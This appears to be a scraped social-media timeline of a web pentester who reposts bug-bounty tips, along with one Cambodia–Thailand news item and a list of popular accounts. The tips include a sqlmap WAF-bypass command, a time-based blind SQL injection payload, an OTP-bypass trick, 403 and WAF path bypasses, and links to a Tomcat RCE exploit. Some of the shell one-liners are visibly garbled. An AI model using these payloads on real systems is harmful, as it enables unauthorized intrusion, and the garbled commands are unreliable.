![wtf_yodhha's tweet photo. javascript How to extract urls,srcs and hrefs from all HTML elements in any website? Open DevTools and run
urls = []
$$('*').forEach(element => {
urls.push(element.src)
urls.push(element.href)
urls.push(element.url)
}); console.log(...new Set(urls))
#infosec #cybersec #bugbounty](https://pbs.twimg.com/media/GfTC56dWQAM51xi.jpg)
Olivia
Online
Linna
@Lin27540538
Web - Mobile pentester
Cambodia
Joined April 2021
104 Following
17 Followers
191 Posts
Cambodia accuses Thailand of detaining 20 soldiers after a ceasefire was agreed between the two sides. Cambodian officials take foreign diplomats to a destroyed border checkpoint in Preah Vihear and deny Thai claims of ceasefire violations.
#Cambodia #Thailand #Ceasefire
Hackers 🔥
Stuck on a 403?
Here are some powerful tricks to try for bypassing 🚀
1⃣ X-Forwarded-For
2⃣ X-Original-URL
3⃣ Referer
4⃣ HTTP method manipulation
5⃣ Case sensitive (/admin or /aDmIn)
6⃣ Encoding
7⃣ Path normalization
Happy hunting! 🎯
beware of all applications developed in-house, where security may not be as strong as in a public app !
⚠️CF-Hero is a reconnaissance tool that uses multiple data sources to discover the origin IP addresses of Cloudflare-protected web applications.
https://t.co/QnjFTFUBDL
✅ Join Telegram For More Content: https://t.co/IEEAE1bbag
----------------------------------------------------------------------------
📖 Your Ethical Hacking Journey Starts Here → https://t.co/xD71mp32c1
🎓 Ready to Skill Up? Enroll Now → https://t.co/6zSWj0mI4F
📢 Join the Community & Stay Updated:
📱 Discord: https://t.co/A2lB4DJSY9
💼 X (Twitter): https://t.co/8iSGOIqVsE
⭐ Found this helpful? Like, Share & Level Up Your Skills!
#CyberSecurity #BugBounty #EthicalHacking #Infosec #BrutSecurity
Apache Tomcat: Potential RCE
Severity : Critical
CVE-2025-24813
Exploit : https://t.co/6ggKgBQrYu
Refrence : https://t.co/6gGeOYAdAp
#ApacheTomcat #bugbounty #RCE
A great and useful tip that helped me find many bugs is just to play with the HTTP method 😋
Here I found broken access control (sent PUT instead of GET/POST) in the API of the target, that enabled me to discover XSS where the developers did not expect any user input 🔥
Bypass OTP in an unexpected way : replace the OTP value to "true" ( without quote )
Origin Request -
{
"OTP": "11111"
}
Modify To -
}
"OTP": true
}
https://t.co/wuAIVUBJdu
Credit: DEep
I just realized I have a large collection of notes taken during pentests, in-depth documentation on techniques and tradecraft, and a sizeable code repo. Considering sharing this in its written form. Probably time to use https://t.co/sJP47K8eCC. Lmk what you think
Bypass waf for SQL injection :)
cloudflare
command :
sqlmap -u "https://t.co/st5htQnPMW" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment,betweeny
time-based blind:
+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO)
🍪 Introducing the “Cookie Sandwich” technique.
This vulnerability manipulates how servers parse cookies, potentially exposing sensitive user information like session IDs.
Read more: https://t.co/kykFin4mVC
I just published Easy $10,000 bounty using Wayback Machine https://t.co/RSZ4OMhUFS
Day 8 & 9 : LFI x2
Refer : https://t.co/055JQoxmh2
Video : Will post on YouTube
Introducing InternetCTF! 🤯 Earn up to $10,000 for finding RCE vulnerabilities in open-source software AND creating Tsunami plugin patches. Make the internet safer and get rewarded! 🤑
For details on the program, see our latest blog post:
https://t.co/kKqWjJTBO3
Want to master 2FA bypassing? 🤑
Let's look at several possible ways to bypass this 2FA screen! 👇
Extract all endpoints from a JS File and take your bug 🐞
✅Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
✅Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt
#infosec #cybersec #bugbountytips
![wtf_yodhha's tweet photo. Extract all endpoints from a JS File and take your bug 🐞
✅Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
✅Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt
#infosec #cybersec #bugbountytips](https://pbs.twimg.com/media/GfZKHLHWIAEKo-J.jpg)
You can bypass path-based WAF restrictions by appending raw/unencoded non-printable and extended-ASCII characters like \x09 (Spring), \xA0 (Express), and \x1C-1F (Flask):
Did you know you can use an ancient magic cookie to downgrade parsers and bypass WAFs?! Neither did we. Enjoy!
https://t.co/Hv62isyGNn
2FA Bypasses?
Here are 10 Blogs to Learn more about it!
1. https://t.co/aGRJmQPhNP
2. https://t.co/UVfKtZtXN8
3. https://t.co/ic9rrJM0PG
4. https://t.co/9Kk0wsqsaf
5. https://t.co/sFhzFvWqNn
6. https://t.co/ZG6bmDUj2q
7. https://t.co/I1CchyCt3b
8. https://t.co/Y7296OweR4
9. https://t.co/OynjHYvoOC
10. https://t.co/WB7URBP3F0
Stay connected and explore more:
Courses & Trainings: https://t.co/a6RCIafqeB
Social Media & Resources: https://t.co/d5w93AqCAY
Course Reviews: https://t.co/SUIitAa9Fq
Most Popular Users
Elon Musk 
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.3M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
87M followers
Taylor Swift
@taylorswift13
80.8M followers
Lady Gaga
@ladygaga
72.4M followers
Kim Kardashian
@kimkardashian
69.5M followers
Virat Kohli
@imvkohli
68.9M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.5M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.1M followers